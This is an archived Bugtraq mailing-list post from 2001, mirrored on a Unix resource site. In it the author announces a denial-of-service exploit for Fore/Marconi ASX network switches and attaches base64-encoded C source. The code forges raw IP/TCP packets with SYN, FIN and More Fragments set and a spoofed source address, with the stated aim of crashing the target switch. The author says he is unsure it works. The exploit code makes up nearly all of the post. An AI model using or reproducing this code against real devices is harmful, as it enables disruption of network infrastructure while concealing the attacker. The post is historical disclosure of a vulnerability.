BSD, Linux, Cisco, Web, Palm, other unix RUSSIAN version Search:  Новость: Советы по работе в KDE под Mandrake 9.0 SOFT - Unix Software catalog LINKS - Unix resources TOPIC - Articles from usenet DOCUMENTATION - Unix guides News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Tue, 20 Feb 2001 18:48:56 -0800
From: "J.K. Garvey" <jim@trig.org>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Fore/Marconi ASX Switch DoS exploit

--Boundary-=_XrJmOWFrxsjyBldbEFSArCBynEcd
Content-Type: text/plain
Content-Transfer-Encoding: 8bit

Attached is a simple program that sets the SYN, FIN and More Fragments bits,
which causes a DoS on Fore/Marconi ASX switches. I do not know if this works,
but it performs the desired operations as Keith Pachulski described. Congrats to
Keith for the discovery of this bug.

Jim
--Boundary-=_XrJmOWFrxsjyBldbEFSArCBynEcd
Content-Type: text/x-c;
  name="asxswitch.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="asxswitch.c"

LyoKVGhpcyBEb1MgYXR0YWNrIHdhcyBkaXNjb3ZlcmVkIGJ5IEtlaXRoIFBhY2h1bHNraSBhbmQg
d3JpdHRlbiBieSBKLksuIEdhcnZleS4gVGhpcyBzaW1wbGUgcHJvZ3JhbSBzZXRzIHRoZSBTWU4s
IEZJTiBhbmQgTW9yZSBGcmFnbWVudCBiaXRzIGFuZCBzZW5kcyB0aGlzIGNyYWZ0ZWQgcGFja2V0
IGZyb20gYSBzcG9vZmVkIGhvc3QgdG8gYSBkZXN0aW5lZCBGb3JlL01hcmNvbmkgQVNYIHN3aXRj
aCwgd2hpY2ggY2F1c2VzIGl0IHRvIGNyYXNoLiBJIGhhdmUgbm8gaWRlYSBpZiB0aGlzIHdvcmtz
LCBidXQgaXQgZG9lcyB3aGF0IEtlaXRoIFBhY2h1bHNraSBkZXNjcmliZWQuIAoqLwoKI2luY2x1
ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHNpZ25hbC5oPgojaW5j
bHVkZSA8c3RyaW5nLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1ZGUgPG5ldGRiLmg+CiNp
bmNsdWRlIDxuZXRpbmV0L2luLmg+CiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+CiNpbmNsdWRlIDxh
cnBhL2luZXQuaD4KI2luY2x1ZGUgPGxpbnV4L2lwLmg+CiNpbmNsdWRlIDxsaW51eC90Y3AuaD4K
CiNkZWZpbmUgSVBfTUYgMHgyMDAwCQkvKiBNb3JlIGZyYWdtZW50IGJpdHMgKi8KCnZvaWQgICAg
ICAgICAgICAgICAgZm9yZ2UgKHVuc2lnbmVkIGludCwgdW5zaWduZWQgaW50LCB1bnNpZ25lZCBz
aG9ydCk7IAp1bnNpZ25lZCBzaG9ydCAgICAgIGluX2Nrc3VtICh1bnNpZ25lZCBzaG9ydCAqLCBp
bnQpOwp1bnNpZ25lZCBpbnQgICAgICAgIGhvc3RfY29udmVydCAoY2hhciAqKTsKdm9pZCAgICAg
ICAgICAgICAgICB1c2FnZSAoY2hhciAqKTsKCm1haW4gKGludCBhcmdjLCBjaGFyICoqYXJndikK
ewoJdW5zaWduZWQgaW50ICAgICAgICBzb3VyY2VfaG9zdCA9IDAsIGRlc3RfaG9zdCA9IDA7Cgl1
bnNpZ25lZCBzaG9ydCAgICAgIHNvdXJjZV9wb3J0ID0gMCwgZGVzdF9wb3J0ID0gODA7CglpbnQg
ICAgICAgICAgICAgICAgIGlucHV0OwoJY2hhciAgICAgICAgICAgICAgICBkZXN0aG9zdFsxNl0s
IHNyY2hvc3RbMTZdOwoKCXByaW50ZiAoIlxuRGVuaWFsIG9mIFNlcnZpY2UgYXR0YWNrIGZvciBG
b3JlL01hcmNvbmkgQVNYIFN3aXRjaGVzXG4iKTsKCXByaW50ZgoJCSgiRm91bmQgYnkgS2VpdGgg
UGFjaHVsc2tpIDxrZWl0aHBAY29ycC5wdGQubmV0PlxuRXhwbG9pdCB3cml0dGVuIGJ5IEouSy4g
R2FydmV5IDxqaW1AdHJpZy5vcmc+XG4iKTsKCglpZiAoZ2V0dWlkICgpICE9IDApCgl7CgkJcHJp
bnRmCgkJCSgiXG5Sb290IGlzIHJlcXVpcmVkLiBEdWguXG4iKTsKCQlleGl0ICgwKTsKCX0KCglp
ZiAoYXJnYyA8IDUpCgl7CgkJdXNhZ2UgKGFyZ3ZbMF0pOwoJCWV4aXQgKDApOwoJfQoKICAgICAg
ICB3aGlsZSAoKGlucHV0ID0gZ2V0b3B0IChhcmdjLCBhcmd2LCAiczpkOnA6IikpICE9IC0xKQoJ
ewoJCXN3aXRjaCAoaW5wdXQpCgkJewoJCQljYXNlICdzJzoKCQkJCXNvdXJjZV9ob3N0ID0gaG9z
dF9jb252ZXJ0IChvcHRhcmcpOwoJCQkJc3RybmNweSAoc3JjaG9zdCwgb3B0YXJnLCAxNik7CgkJ
CWJyZWFrOwoKCQkJY2FzZSAnZCc6CgkJCQlkZXN0X2hvc3QgPSBob3N0X2NvbnZlcnQgKG9wdGFy
Zyk7CgkJCQlzdHJuY3B5IChkZXN0aG9zdCwgb3B0YXJnLCAxNik7CgkJCWJyZWFrOwoKCQkJY2Fz
ZSAncCc6CgkJCQlkZXN0X3BvcnQgPSBhdG9pKG9wdGFyZyk7CgkJCWJyZWFrOwoJCX0KCX0KCglm
b3JnZSAoc291cmNlX2hvc3QsIGRlc3RfaG9zdCwgZGVzdF9wb3J0KTsgCglwcmludGYgKCJcbkNy
YWZ0ZWQgcGFja2V0IHNlbnQhXG4iKTsKCglleGl0ICgwKTsKfQoKdm9pZApmb3JnZSAodW5zaWdu
ZWQgaW50IHNvdXJjZV9hZGRyLCB1bnNpZ25lZCBpbnQgZGVzdF9hZGRyLCB1bnNpZ25lZCBzaG9y
dCBkZXN0X3BvcnQpIAp7CglzdHJ1Y3Qgc2VuZAoJewoJCXN0cnVjdCBpcGhkciAgICAgICAgaXA7
CgkJc3RydWN0IHRjcGhkciAgICAgICB0Y3A7Cgl9CglzZW5kOwoKCS8qIEZyb20gc3luaG9zZS5j
IGJ5IGtuaWdodCAqLwoJc3RydWN0IHBzZXVkb19oZWFkZXIKCXsKCQl1bnNpZ25lZCBpbnQgICAg
ICAgIHNvdXJjZV9hZGRyZXNzOwoJCXVuc2lnbmVkIGludCAgICAgICAgZGVzdF9hZGRyZXNzOwoJ
CXVuc2lnbmVkIGNoYXIgICAgICAgcGxhY2Vob2xkZXI7CgkJdW5zaWduZWQgY2hhciAgICAgICBw
cm90b2NvbDsKCQl1bnNpZ25lZCBzaG9ydCAgICAgIHRjcF9sZW5ndGg7CgkJc3RydWN0IHRjcGhk
ciAgICAgICB0Y3A7Cgl9Cglwc2V1ZG9faGVhZGVyOwoKCWludCAgICAgICAgICAgICAgICAgY2g7
CglpbnQgICAgICAgICAgICAgICAgIHNlbmRfc29ja2V0OwoJaW50ICAgICAgICAgICAgICAgICBy
ZWN2X3NvY2tldDsKCXN0cnVjdCBzb2NrYWRkcl9pbiAgc2luOwoJY2hhciAgICAgICAgICAgICAg
ICppbnB1dDsKCglzcmFuZCAoKGdldHBpZCAoKSkgKiAoZGVzdF9wb3J0KSk7CgoJLyogQmVnaW4g
Zm9yZ2VkIElQIGhlYWRlciAqLwoJc2VuZC5pcC5paGwgPSA1OwoJc2VuZC5pcC52ZXJzaW9uID0g
NDsKCXNlbmQuaXAudG9zID0gMDsKCXNlbmQuaXAudG90X2xlbiA9IGh0b25zICg0MCk7CglzZW5k
LmlwLmlkID0gKGludCkgKDI1NS4wICogcmFuZCAoKSAvIChSQU5EX01BWCArIDEuMCkpOwoKCS8q
IE5vdGUgbW9yZSBmcmFnbWVudHMgYml0IGhhcyBiZWVuIHNldCAqLwoJc2VuZC5pcC5mcmFnX29m
ZiA9IGh0b25zIChJUF9NRik7CgoJc2VuZC5pcC50dGwgPSA2NDsKCXNlbmQuaXAucHJvdG9jb2wg
PSBJUFBST1RPX1RDUDsKCXNlbmQuaXAuY2hlY2sgPSAwOwoJc2VuZC5pcC5zYWRkciA9IHNvdXJj
ZV9hZGRyOwoJc2VuZC5pcC5kYWRkciA9IGRlc3RfYWRkcjsKCgkvKiBCZWdpbiBmb3JnZWQgVENQ
IGhlYWRlciAqLwoJc2VuZC50Y3Auc291cmNlID0gMSArIChpbnQpICgyNS4wICogcmFuZCAoKSAv
IChSQU5EX01BWCArIDEuMCkpOwoJc2VuZC50Y3Auc2VxID0gMSArIChpbnQpICgxMDAwMC4wICog
cmFuZCAoKSAvIChSQU5EX01BWCArIDEuMCkpOwoKCXNlbmQudGNwLmRlc3QgPSBodG9ucyAoZGVz
dF9wb3J0KTsKCXNlbmQudGNwLmFja19zZXEgPSAwOwoJc2VuZC50Y3AucmVzMSA9IDA7CglzZW5k
LnRjcC5kb2ZmID0gNTsKCgkvKiBOb3RlIEZJTiBhbmQgU1lOIGZsYWdzIGFyZSBzZXQgKi8KCXNl
bmQudGNwLmZpbiA9IDE7CglzZW5kLnRjcC5zeW4gPSAxOwoKCXNlbmQudGNwLnJzdCA9IDA7Cglz
ZW5kLnRjcC5wc2ggPSAwOwoJc2VuZC50Y3AuYWNrID0gMDsKCXNlbmQudGNwLnVyZyA9IDA7Cglz
ZW5kLnRjcC53aW5kb3cgPSBodG9ucyAoNTEyKTsKCXNlbmQudGNwLmNoZWNrID0gMDsKCXNlbmQu
dGNwLnVyZ19wdHIgPSAwOwoKCS8qIERyb3Agb3VyIGZvcmdlZCBkYXRhIGludG8gdGhlIHNvY2tl
dCBzdHJ1Y3QgKi8KCXNpbi5zaW5fZmFtaWx5ID0gQUZfSU5FVDsKCXNpbi5zaW5fcG9ydCA9IHNl
bmQudGNwLnNvdXJjZTsKCXNpbi5zaW5fYWRkci5zX2FkZHIgPSBzZW5kLmlwLmRhZGRyOwoKCS8q
IE5vdyBvcGVuIHRoZSByYXcgc29ja2V0IGZvciBzZW5kaW5nICovCglzZW5kX3NvY2tldCA9IHNv
Y2tldCAoQUZfSU5FVCwgU09DS19SQVcsIElQUFJPVE9fUkFXKTsKCWlmIChzZW5kX3NvY2tldCA8
IDApCgl7CgkJcGVycm9yICgiU2VuZCBzb2NrZXQgY2Fubm90IGJlIG9wZW5lZC4iKTsKCQlleGl0
ICgxKTsKCX0KCgkvKiBNYWtlIElQIGhlYWRlciBjaGVja3N1bSAqLwoJc2VuZC5pcC5jaGVjayA9
IGluX2Nrc3VtICgodW5zaWduZWQgc2hvcnQgKikgJnNlbmRfdGNwLmlwLCAyMCk7CgoJLyogRmlu
YWwgcHJlcGFyYXRpb24gb2YgdGhlIGZ1bGwgaGVhZGVyICovCgoJLyogRnJvbSBzeW5ob3NlLmMg
Ynkga25pZ2h0ICovCglwc2V1ZG9faGVhZGVyLnNvdXJjZV9hZGRyZXNzID0gc2VuZC5pcC5zYWRk
cjsKCXBzZXVkb19oZWFkZXIuZGVzdF9hZGRyZXNzID0gc2VuZC5pcC5kYWRkcjsKCXBzZXVkb19o
ZWFkZXIucGxhY2Vob2xkZXIgPSAwOwoJcHNldWRvX2hlYWRlci5wcm90b2NvbCA9IElQUFJPVE9f
VENQOwoJcHNldWRvX2hlYWRlci50Y3BfbGVuZ3RoID0gaHRvbnMgKDIwKTsKCgliY29weSAoKGNo
YXIgKikgJnNlbmQudGNwLCAoY2hhciAqKSAmcHNldWRvX2hlYWRlci50Y3AsIDIwKTsKCS8qIEZp
bmFsIGNoZWNrc3VtIG9uIHRoZSBlbnRpcmUgcGFja2FnZSAqLwoJc2VuZC50Y3AuY2hlY2sgPSBp
bl9ja3N1bSAoKHVuc2lnbmVkIHNob3J0ICopICZwc2V1ZG9faGVhZGVyLCAzMik7CgkvKiBBd2F5
IHdlIGdvLi4uLiAqLwoJc2VuZHRvIChzZW5kX3NvY2tldCwgJnNlbmQsIDQwLCAwLAoJCShzdHJ1
Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mIChzaW4pKTsKCWNsb3NlIChzZW5kX3NvY2tldCk7
Cn0KCnVuc2lnbmVkIHNob3J0CmluX2Nrc3VtICh1bnNpZ25lZCBzaG9ydCAqcHRyLCBpbnQgbmJ5
dGVzKQp7CglyZWdpc3RlciBsb25nICAgICAgIHN1bTsJLyogYXNzdW1lcyBsb25nID09IDMyIGJp
dHMgKi8KCXVfc2hvcnQgICAgICAgICAgICAgb2RkYnl0ZTsKCXJlZ2lzdGVyIHVfc2hvcnQgICAg
YW5zd2VyOwkvKiBhc3N1bWVzIHVfc2hvcnQgPT0gMTYgYml0cyAqLwoKCXN1bSA9IDA7Cgl3aGls
ZSAobmJ5dGVzID4gMSkKCXsKCQlzdW0gKz0gKnB0cisrOwoJCW5ieXRlcyAtPSAyOwoJfQoKCWlm
IChuYnl0ZXMgPT0gMSkKCXsKCQlvZGRieXRlID0gMDsJLyogbWFrZSBzdXJlIHRvcCBoYWxmIGlz
IHplcm8gKi8KCQkqKCh1X2NoYXIgKikgJiBvZGRieXRlKSA9ICoodV9jaGFyICopIHB0cjsgLyog
b25lIGJ5dGUgb25seSAqLwoJCXN1bSArPSBvZGRieXRlOwoJfQoKCXN1bSA9IChzdW0gPj4gMTYp
ICsgKHN1bSAmIDB4ZmZmZik7CS8qIGFkZCBoaWdoLTE2IHRvIGxvdy0xNiAqLwoJc3VtICs9IChz
dW0gPj4gMTYpOwkvKiBhZGQgY2FycnkgKi8KCWFuc3dlciA9IH5zdW07CQkvKiBvbmVzLWNvbXBs
ZW1lbnQsIHRoZW4gdHJ1bmNhdGUgdG8gMTYgYml0cyAqLwoJcmV0dXJuIChhbnN3ZXIpOwp9Cgp1
bnNpZ25lZCBpbnQKaG9zdF9jb252ZXJ0IChjaGFyICpob3N0bmFtZSkKewoJc3RhdGljIHN0cnVj
dCBpbl9hZGRyIGk7CglzdHJ1Y3QgaG9zdGVudCAgICAgKmg7CgoJaS5zX2FkZHIgPSBpbmV0X2Fk
ZHIgKGhvc3RuYW1lKTsKCWlmIChpLnNfYWRkciA9PSAtMSkKCXsKCQloID0gZ2V0aG9zdGJ5bmFt
ZSAoaG9zdG5hbWUpOwoJCWlmIChoID09IE5VTEwpCgkJewoJCQlmcHJpbnRmIChzdGRlcnIsICJj
YW5ub3QgcmVzb2x2ZSAlc1xuIiwgaG9zdG5hbWUpOwoJCQlleGl0ICgwKTsKCQl9CgkJYmNvcHkg
KGgtPmhfYWRkciwgKGNoYXIgKikgJmkuc19hZGRyLCBoLT5oX2xlbmd0aCk7Cgl9CglyZXR1cm4g
aS5zX2FkZHI7Cn0KCnZvaWQKdXNhZ2UgKGNoYXIgKnByb2duYW1lKQp7CglwcmludGYgKCJcbnVz
YWdlOiAlcyAtcyBzb3VyY2VfaG9zdCAtZCBkZXN0aW5hdGlvbl9ob3N0IC1wIGRlc3RpbmF0aW9u
X3BvcnQgKGRlZmF1bHQgaXMgODApXG5cbiIsCgkJcHJvZ25hbWUpOwp9Cg==

--Boundary-=_XrJmOWFrxsjyBldbEFSArCBynEcd--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Быстрая навигация по сайту __________________ КАТАЛОГИ: Каталог программного обеспечения Каталог ссылок на unix ресурсы Каталог тематических статей Архив документации Советы, заметки MAN - Системные руководства __________________ НОВОСТИ: Новости OpenNews LastSoft - Свежий софт Обзоры ПО с freshmeat Проблемы безопасности Новости с других сайтов __________________ ОБЩЕНИЕ: Форум/Конферения _______________ МИНИ-ПОРТАЛЫ: CISCO.opennet.ru BSD.opennet.ru LINUX.opennet.ru SOLARIS.opennet.ru WEB.opennet.ru - web-технологии SECURITY.opennet.ru PALM.opennet.ru - карманные ПК __________________ НАВИГАЦИЯ: Навигация по ключевым словам Системы ПОИСКА __________________ РАЗНОЕ: ЦУП - Центр Управления Проектом Добавление в каталоги Закладки Добавить в закладки Created 1996-2003 by Maxim Chirkov   Добавить, Реклама, Вебмастеру, ЦУП, ГИД